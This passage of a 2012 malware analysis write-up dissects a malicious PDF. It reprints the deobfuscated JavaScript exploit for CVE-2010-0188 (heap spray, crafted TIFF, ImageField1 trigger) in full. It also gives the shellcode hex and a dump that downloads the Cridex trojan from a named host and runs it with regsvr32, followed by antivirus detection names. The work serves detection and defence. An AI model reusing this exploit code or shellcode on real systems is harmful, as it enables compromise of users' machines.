  260.  var pointers_a, i;
        // padding, bbb..hhh, pointers_a, x and y are declared but never referenced in the
        // visible script (left-over template code, presumably).
  261.  var x = new Array();
  262.  var y = new Array();
        // _l1/_l2: two fixed hex prefixes, one of which _j3 picks by viewer version, each
        // followed by the same shellcode hex taken from /CreationDate.
  263.  var _l1 = "4c20600f0517804a3c20600f0f63804aa3eb804a3020824a6e2f804a41414141260000000000000000000000000000001239804a6420600f000400004141414141414141" + event.target.creationDate.split('|')[1].replace(/; /g, '');
  264.  var _l2 = "4c20600fa563804a3c20600f9621804a901f804a3090844a7d7e804a41414141260000000000000000000000000000007188804a6420600f000400004141414141414141" + event.target.creationDate.split('|')[1].replace(/; /g, '');
        // _l3 = Acrobat `app` object; _l4 is the global array filled by _I0 (the spray).
  265.  _l3 = app;
  266.  _l4 = new Array();
  267.  function _l5()
        // Viewer version as an integer, used by _j3 to choose between _l1 and _l2.
        // NOTE(review): replace('.', '') with a string pattern removes only the FIRST dot,
        // so a three-part version such as "9.4.1" becomes "94.1" -> parseInt -> 94, which is
        // always below the 9000 threshold in _j3; only two-part versions pad to 4 digits.
  268.  {
  269.    var _l6 = _l3.viewerVersion.toString();
  270.    _l6 = _l6.replace('.', '');
  271.    while (_l6.length < 4)_l6 += '0';
  272.    return parseInt(_l6, 10)
  273.  }
  274.  function _l7(_l8, _l9)
        // Repeats _l8 by self-concatenation until its length*2 >= _l9, then returns the
        // first _l9/2 characters (substring truncates a fractional end). Used by _I0 to
        // build fixed-size filler/spray strings.
  275.  {
  276.    while (_l8.length * 2 < _l9)_l8 += _l8;
  277.    return _l8.substring(0, _l9 / 2)
  278.  }
  279.  function _I0(_I1)
        // Heap spray. _I1 is a %u-encoded string (built by _j2); it is unescaped, padded
        // with %u9090 filler to a fixed block size, grown with _l7 and stored 400 times in
        // the global _l4 so the copies stay alive. Detection: unescape('%u9090') together
        // with a fixed-count loop filling a global array is the signature to look for.
  280.  {
  281.    _I1 = unescape(_I1);
  282.    roteDak = _I1.length * 2;
  283.    dakRote = unescape('%u9090');
  284.    spray = _l7(dakRote, 0x2000 - roteDak);
  285.    loxWhee = _I1 + spray;
  286.    loxWhee = _l7(loxWhee, 524098);
          // `i`, roteDak, dakRote, spray, loxWhee are all undeclared globals (shared with _I3).
  287.    for (i = 0; i < 400; i ++ )_l4[i] = loxWhee.substr(0, loxWhee.length - 1) + dakRote;
  288.  }
  289.  function _I2(_I1, len)
        // Repeats _I1 until it is at least `len` characters, then cuts it to exactly `len`.
        // _j3 uses it to produce 10984 characters of 'QUFB' (base64 for "AAA") filler.
  290.  {
  291.    while (_I1.length < len)_I1 += _I1;
  292.    return _I1.substring(0, len)
  293.  }
  294.  function _I3(_I1)
        // Hex string -> raw byte string: every two hex digits become one character.
        // Applied to _l1/_l2 in _j3, i.e. this turns the shellcode hex into bytes.
        // ret, b, c and i are undeclared globals.
  295.  {
  296.    ret = '';
  297.    for (i = 0; i < _I1.length; i += 2)
  298.    {
  299.      b = _I1.substr(i, 2);
  300.      c = parseInt(b, 16);
  301.      ret += String.fromCharCode(c);
  302.    }
  303.    return ret
  304.  }
  305.  function _ji1(_I1, _I4)
        // Repeating-key XOR of _I1 with key _I4. NOTE(review): _j3 calls this with _I4 = ''
        // so _l9 is 0, _I6 % 0 is NaN, ''.charCodeAt(NaN) is NaN, and x ^ NaN == x; with
        // the empty key this is an identity transform (the XOR layer is unused here).
        // _I5, _I6, _I7, _I8 and _l9 are undeclared globals.
  306.  {
  307.    _I5 = '';
  308.    for (_I6 = 0; _I6 < _I1.length; _I6 ++ )
  309.    {
  310.      _l9 = _I4.length;
  311.      _I7 = _I1.charCodeAt(_I6);
  312.      _I8 = _I4.charCodeAt(_I6 % _l9);
  313.      _I5 += String.fromCharCode(_I7 ^ _I8);
  314.    }
  315.    return _I5
  316.  }
  317.  function _I9(_I6)
        // Number -> hex string, left-padded with '0' to an even number of digits
        // (so byte values give exactly two digits). _j0, _j1, _I5 are undeclared globals.
  318.  {
  319.    _j0 = _I6.toString(16);
  320.    _j1 = _j0.length;
  321.    _I5 = (_j1 % 2) ? '0' + _j0 : _j0;
  322.    return _I5
  323.  }
  324.  function _j2(_I1)
        // Byte string -> "%uXXXX" sequence for unescape(): each pair of characters becomes
        // one 16-bit unit with the SECOND byte first (little-endian order). _j3 pads its
        // input to an even length beforehand, so charCodeAt(_I6 + 1) never runs off the end.
  325.  {
  326.    _I5 = '';
  327.    for (_I6 = 0; _I6 < _I1.length; _I6 += 2)
  328.    {
  329.      _I5 += '%u';
  330.      _I5 += _I9(_I1.charCodeAt(_I6 + 1));
  331.      _I5 += _I9(_I1.charCodeAt(_I6))
  332.    }
  333.    return _I5
  334.  }
  335.  function _j3()
        // Exploit driver (the writeup identifies this as CVE-2010-0188, libtiff in
        // Adobe Reader/Acrobat). Picks a version-specific blob, sprays the shellcode
        // via _I0, then writes a base64 image blob into the XFA field ImageField1.
  336.  {
  337.    _j4 = _l5();
          // Two variants selected on the numeric viewer version (see the caveat in _l5).
  338.    if (_j4 < 9000)
  339.    {
  340.      _j5 = 'o+uASjgggkpuL4BK/////wAAAABAAAAAAAAAAAAQAAAAAAAAfhaASiAgYA98EIBK';
  341.      _j6 = _l1;
  342.      _j7 = _I3(_j6)
  343.    }
  344.    else
  345.    {
  346.      _j5 = 'kB+ASjiQhEp9foBK/////wAAAABAAAAAAAAAAAAQAAAAAAAAYxCASiAgYA/fE4BK';
  347.      _j6 = _l2;
  348.      _j7 = _I3(_j6)
  349.    }
          // _ll1 is base64: 'SUkqA' decodes to "II*\0" (the little-endian TIFF magic),
          // followed by 10984 chars of "AAA" filler, a fixed tail and the per-version _j5.
          // That is consistent with the libtiff identification above.
  350.    _j8 = 'SUkqADggAABB';
  351.    _j9 = _I2('QUFB', 10984);
  352.    _ll0 = 'QQcAAAEDAAEAAAAwIAAAAQEDAAEAAAABAAAAAwEDAAEAAAABAAAABgEDAAEAAAABAAAAEQEEAAEAAAAIAAAAFwEEAAEAAAAwIAAAUAEDAMwAAACSIAAAAAAAAAAMDAj/////';
  353.    _ll1 = _j8 + _j9 + _ll0 + _j5;
          // Empty key: _ji1 returns _j7 unchanged here.
  354.    _ll2 = _ji1(_j7, '');
  355.    if (_ll2.length % 2)_ll2 += unescape('%00');
  356.    _ll3 = _j2(_ll2);
          // with({k:..}) only aliases _ll3 as k; _I0(k) performs the spray.
  357.    with (
  358.    {
  359.      k : _ll3
  360.    }
  361.    )_I0(k);
          // Trigger: the crafted TIFF is handed to the XFA image field. An assignment to
          // ImageField1.rawValue from script is the indicator to alert on.
  362.    ImageField1.rawValue = _ll1
  363.  }
        // Entry point of the second stage: runs the spray + trigger immediately.
  364.  _j3();
  365.  
  366.  
  367.  
  368. ====================================
  369.  
  370. EXPLOIT IS DETECTED IN....
  371.  
  372. =====================================
  373.  
  374. // Oh, see the code of "ImageField1.rawValue" near the end of the script,
  375. // It is the method used to exploit the Libtiff integer overflow in Adobe Reader and Acrobat (PoC)
  376. // CVE-2010-0188; the function below is the actual code used for this exploitation:
  377.  
  378.  function _j3()
        // Same _j3 as in the full listing above (the closing brace is omitted in this
        // excerpt). Key indicators: viewer-version branch, base64 TIFF blob ('SUkqA' =
        // "II*\0") assembled in _ll1, spray via _I0, and the ImageField1.rawValue write.
  379.  {
  380.    _j4 = _l5();
  381.    if (_j4 < 9000)
  382.    {
  383.      _j5 = 'o+uASjgggkpuL4BK/////wAAAABAAAAAAAAAAAAQAAAAAAAAfhaASiAgYA98EIBK';
  384.      _j6 = _l1;
  385.      _j7 = _I3(_j6)
  386.    }
  387.    else
  388.    {
  389.      _j5 = 'kB+ASjiQhEp9foBK/////wAAAABAAAAAAAAAAAAQAAAAAAAAYxCASiAgYA/fE4BK';
  390.      _j6 = _l2;
  391.      _j7 = _I3(_j6)
  392.    }
  393.    _j8 = 'SUkqADggAABB';
  394.    _j9 = _I2('QUFB', 10984);
  395.    _ll0 = 'QQcAAAEDAAEAAAAwIAAAAQEDAAEAAAABAAAAAwEDAAEAAAABAAAABgEDAAEAAAABAAAAEQEEAAEAAAAIAAAAFwEEAAEAAAAwIAAAUAEDAMwAAACSIAAAAAAAAAAMDAj/////';
  396.    _ll1 = _j8 + _j9 + _ll0 + _j5;
  397.    _ll2 = _ji1(_j7, '');
  398.    if (_ll2.length % 2)_ll2 += unescape('%00');
  399.    _ll3 = _j2(_ll2);
  400.    with (
  401.    {
  402.      k : _ll3
  403.    }
  404.    )_I0(k);
          // Trigger line: crafted TIFF bytes written to the XFA image field.
  405.    ImageField1.rawValue = _ll1
  406.  
  407. // In this case we have only a single exploitation.
  408.  
  409.  
  410. ====================================
  411.  
  412. SHELLCODE DETECTED IN....
  413.  
  414. ; Post-exploitation must be followed by an infection act;
  415. ; the method used is usually shellcode,
  416. ; where is it?
  417.  
  418. =====================================
  419.  
  420.  
  421. // See the below code;
  422.  
  423.  app.alert = event.target.creationDate.split('|')[1].replace(/; /g, '');
        // NOTE(review): the condensed dump earlier on this page has replace(/;/g,'') (no
        // space); the "; " in this beautified copy looks like a formatter artifact.
  424.  var padding;
  425.  var bbb, ccc, ddd, eee, fff, ggg, hhh;
  426.  var pointers_a, i;
  427.  var x = new Array();
  428.  var y = new Array();
        // The SECOND '|' segment of /CreationDate (the shellcode hex shown below) is
        // appended to both fixed prefixes; _j3 later picks one by viewer version.
  429.  var _l1 = "4c20600f0517804a3c20600f0f63804aa3eb804a3020824a6e2f804a41414141260000000000000000000000000000001239804a6420600f000400004141414141414141" + event.target.creationDate.split('|')[1].replace(/; /g, '');
  430.  var _l2 = "4c20600fa563804a3c20600f9621804a901f804a3090844a7d7e804a41414141260000000000000000000000000000007188804a6420600f000400004141414141414141" + event.target.creationDate.split('|')[1].replace(/; /g, '');
  431.  
  432.  
  433. // it uses the SECOND ARRAY of a that we split before (I wrote it again below:)
  434.  
  435. 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
  436.  
  437. //after adding the first part
  438. //with: "4c20600f0517804a3c20600f0f63804aa3eb804a3020824a6e2f804a41414141260000000000000000000000000000001239804a6420600f000400004141414141414141"
  439. // so the real shellcode string will be...
  440.  
  441. 4c20600f0517804a3c20600f0f63804aa3eb804a3020824a6e2f804a41414141260000000000000000000000000000001239804a6420600f0004000041414141414141416683e4fcfc85e47534e95f33c0648b40308b400c8b701c568b760833db668b5e3c0374332c81ee1510ffffb88b4030c346390675fb87342485e47551e9eb4c51568b753c8b74357803f5568b762003f533c94941fcad03c533db0fbe1038f27408c1cb0d03da40ebf13b1f75e65e8b5e2403dd668b0c4b8d46ecff54240c8bd803dd8b048b03c5ab5e59c3eb53ad8b6820807d0c33740396ebf38b68088bf76a0559e898ffffffe2f9e80000000058506a4068ff0000005083c01950558bec8b5e1083c305ffe3686f6e00006875726c6d54ff1683c4088be8e861ffffffeb02eb7281ec040100008d5c240cc7042472656773c744240476723332c7442408202d73205368f8000000ff560c8be833c951c7441d0077706274c7441d052e646c6cc6441d0900598ac1043088441d0441516a006a0053576a00ff561485c075166a0053ff56046a0083eb0c53ff560483c30ceb02eb1347803f0075fa47803f0075c46a006afeff5608e89cfeffff8e4e0eec98fe8a0e896f01bd33ca8a5b1bc64679361a2f70687474703a2f2f64656c656d6961746f722e72753a383038302f666f72756d2f6c696e6b732f636f6c756d6e2e7068703f6b73636e68637a3d33303a316e3a31693a31693a3333266973716a743d32763a316b3a316d3a33323a33333a316b3a316b3a33313a316a3a316f26686d786f77783d3169266467616d777278783d6c7466766d267869647570793d6a6a6e71686c0000
  442.  
  443. // These moronz think they are smart enough to split the shellcode binary,
  444. // but we are smarter.
  445.  
  446. //In a binary editor you can see the shellcode as below:
  447.  
  448. 4c 20 60 0f 05 17 80 4a  3c 20 60 0f 0f 63 80 4a  L.`....J<.`..c.J  
  449. a3 eb 80 4a 30 20 82 4a  6e 2f 80 4a 41 41 41 41  ...J0..Jn/.JAAAA  
  450. 26 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  &...............  
  451. 12 39 80 4a 64 20 60 0f  00 04 00 00 41 41 41 41  .9.Jd.`.....AAAA  
  452. 41 41 41 41 66 83 e4 fc  fc 85 e4 75 34 e9 5f 33  AAAAf......u4._3  
  453. c0 64 8b 40 30 8b 40 0c  8b 70 1c 56 8b 76 08 33  .d.@0.@..p.V.v.3  
  454. db 66 8b 5e 3c 03 74 33  2c 81 ee 15 10 ff ff b8  .f.^<.t3,.......  
  455. 8b 40 30 c3 46 39 06 75  fb 87 34 24 85 e4 75 51  .@0.F9.u..4$..uQ  
  456. e9 eb 4c 51 56 8b 75 3c  8b 74 35 78 03 f5 56 8b  ..LQV.u<.t5x..V.  
  457. 76 20 03 f5 33 c9 49 41  fc ad 03 c5 33 db 0f be  v...3.IA....3...  
  458. 10 38 f2 74 08 c1 cb 0d  03 da 40 eb f1 3b 1f 75  .8.t......@..;.u  
  459. e6 5e 8b 5e 24 03 dd 66  8b 0c 4b 8d 46 ec ff 54  .^.^$..f..K.F..T  
  460. 24 0c 8b d8 03 dd 8b 04  8b 03 c5 ab 5e 59 c3 eb  $...........^Y..  
  461. 53 ad 8b 68 20 80 7d 0c  33 74 03 96 eb f3 8b 68  S..h..}.3t.....h  
  462. 08 8b f7 6a 05 59 e8 98  ff ff ff e2 f9 e8 00 00  ...j.Y..........  
  463. 00 00 58 50 6a 40 68 ff  00 00 00 50 83 c0 19 50  ..XPj@h....P...P  
  464. 55 8b ec 8b 5e 10 83 c3  05 ff e3 68 6f 6e 00 00  U...^......hon..  
  465. 68 75 72 6c 6d 54 ff 16  83 c4 08 8b e8 e8 61 ff  hurlmT........a.  
  466. ff ff eb 02 eb 72 81 ec  04 01 00 00 8d 5c 24 0c  .....r.......\$.  
  467. c7 04 24 72 65 67 73 c7  44 24 04 76 72 33 32 c7  ..$regs.D$.vr32.  
  468. 44 24 08 20 2d 73 20 53  68 f8 00 00 00 ff 56 0c  D$..-s.Sh.....V.  
  469. 8b e8 33 c9 51 c7 44 1d  00 77 70 62 74 c7 44 1d  ..3.Q.D..wpbt.D.  
  470. 05 2e 64 6c 6c c6 44 1d  09 00 59 8a c1 04 30 88  ..dll.D...Y...0.  
  471. 44 1d 04 41 51 6a 00 6a  00 53 57 6a 00 ff 56 14  D..AQj.j.SWj..V.  
  472. 85 c0 75 16 6a 00 53 ff  56 04 6a 00 83 eb 0c 53  ..u.j.S.V.j....S  
  473. ff 56 04 83 c3 0c eb 02  eb 13 47 80 3f 00 75 fa  .V........G.?.u.  
  474. 47 80 3f 00 75 c4 6a 00  6a fe ff 56 08 e8 9c fe  G.?.u.j.j..V....  
  475. ff ff 8e 4e 0e ec 98 fe  8a 0e 89 6f 01 bd 33 ca  ...N.......o..3.  
  476. 8a 5b 1b c6 46 79 36 1a  2f 70 68 74 74 70 3a 2f  .[..Fy6./phttp:/  
  477. 2f 64 65 6c 65 6d 69 61  74 6f 72 2e 72 75 3a 38  /delemiator.ru:8  
  478. 30 38 30 2f 66 6f 72 75  6d 2f 6c 69 6e 6b 73 2f  080/forum/links/  
  479. 63 6f 6c 75 6d 6e 2e 70  68 70 3f 6b 73 63 6e 68  column.php?kscnh  
  480. 63 7a 3d 33 30 3a 31 6e  3a 31 69 3a 31 69 3a 33  cz=30:1n:1i:1i:3  
  481. 33 26 69 73 71 6a 74 3d  32 76 3a 31 6b 3a 31 6d  3&isqjt=2v:1k:1m  
  482. 3a 33 32 3a 33 33 3a 31  6b 3a 31 6b 3a 33 31 3a  :32:33:1k:1k:31:  
  483. 31 6a 3a 31 6f 26 68 6d  78 6f 77 78 3d 31 69 26  1j:1o&hmxowx=1i&  
  484. 64 67 61 6d 77 72 78 78  3d 6c 74 66 76 6d 26 78  dgamwrxx=ltfvm&x  
  485. 69 64 75 70 79 3d 6a 6a  6e 71 68 6c 00 00        idupy=jjnqhl..    
  486.  
  487.  
  488. ================================
  489.  
  490. DOWNLOAD URL OF PAYLOAD
  491. AND INFECTION METHOD....
  492.  
  493. ================================
  494.  
  495. // The URL for downloading the payload, which leads us to Cridex,
  496. // is written in plain text inside the shellcode, as shown below:
  497. ----------------------------------------
  498. h00p://delemiator.ru:8080/forum/links/column.php?kscnhcz=30:1n:1i:1i:33&isqjt=2v:1k:1m:32:33:1k:1k:31:1j:1o&hmxowx=1i&dgamwrxx=ltfvm&xidupy=jjnqhl
  499. ----------------------------------------
  500. //↑ here it is: the URL this SOB was trying to hide..
  501.  
  502. //The infection performed by this shellcode is done
  503. //through the Windows API, using the OS components kernel32.dll, urlmon.DLL and regsvr32.exe,
  504. // as per the breakdown below:
  505.  
  506. 0x7c801ad9 kernel32.VirtualProtect(lpAddress=0x402202, dwSize=255)
  507. 0x7c801d7b kernel32.LoadLibraryA(lpFileName=urlmon)
  508. 0x7c835dfa kernel32.GetTempPathA(lpBuffer=0x22fa60, nBufferLength=248, [lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\])
  509. 0x1a494bbe urlmon.URLDownloadToFileA(pCaller=0, szURL=http://delemiator.ru:8080/forum/links/column.php?kscnhcz=30:1n:1i:1i:33&isqjt=2v:1k:1m:32:33:1k:1k:31:1j:1o&hmxowx=1i&dgamwrxx=ltfvm&xidupy=jjnqhl, lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll)
  510. 0x7c86250d kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
  511. 0x7c86250d kernel32.WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
  512. 0x7c81cb3b kernel32.TerminateThread(dwExitCode=0)
  513.  
  514. // It prepared memory (the VirtualProtect call above), loaded urlmon, downloaded the Cridex trojan, saved it
  515. // as wpbt0.dll in the Temp folder, executed it, and registered it with regsvr32 -s ...
  516.  
  517. ================================================
  518.  
  519. CURRENT DETECTION OF ANTIVIRUS IS ??
  520.  
  521. ================================================
  522.  
  523. //It has a "not bad" detection: the VT score is (20 / 44)
  524. //
  525. // But you won't know for sure which exploit was used if you
  526. // get hit by this mess, because it shows the below "not so comprehensive" malware names..
  527. // We saw that only F-Secure gives it a good, exploit-specific name (CVE-2010-0188).
  528.  
  529. F-Secure                 : Exploit:W32/CVE-2010-0188.B
  530. DrWeb                    : Exploit.PDF.3096
  531. Microsoft                : Exploit:Win32/Pdfjsc.AEB
  532. VIPRE                    : LooksLike.PDF.Malware.c (v)
  533. AntiVir                  : EXP/Pdfjsc.aeb
  534. TrendMicro               : TROJ_PIDIEF.SMWY
  535. McAfee-GW-Edition        : Exploit-PDF!Blacole.o
  536. TrendMicro-HouseCall     : TROJ_GEN.F47V1125
  537. MicroWorld-eScan         : Exploit.TIFF.Gen
  538. Avast                    : JS:Pdfka-gen [Expl]
  539. nProtect                 : Exploit.TIFF.Gen
  540. GData                    : Exploit.TIFF.Gen
  541. Kaspersky                : HEUR:Exploit.Script.Generic
  542. BitDefender              : Exploit.TIFF.Gen
  543. McAfee                   : Exploit-PDF!Blacole.o
  544. ESET-NOD32               : JS/Exploit.Pdfka.PWF
  545. Ikarus                   : Exploit.PDF
  546. AVG                      : Exploit_c.VVV
  547. Sophos                   : Troj/PDFJs-AAS
  548. Comodo                   : TestSignature.JS.Pdfka.FBQ
  549.  
  550.  
  551. // .. We swore,
  552. // .. the sweat, tears & blood  of a crusader in act, is like a martyr.. one died & shall be replaced by 10 more..
  553. // .. bless & glory to those who stick to fight for the truth 'till the end..
  554. // .. shall we be mocked or broken in fighting, the curse is upon you, malware moronz! By the name of God.
  555. // .. with curse that shall last forever, a curse for those enemies of God..
  556. // ..
  557. // .. Yet,is not too late to stop your evil works. Ask for forgiveness and stop your act.
  558. // ..
  559. ---
  560. #MalwareMustDie
  561. @unixfreaxjp /malware]$ date
  562. Mon Nov 26 21:12:33 JST 2012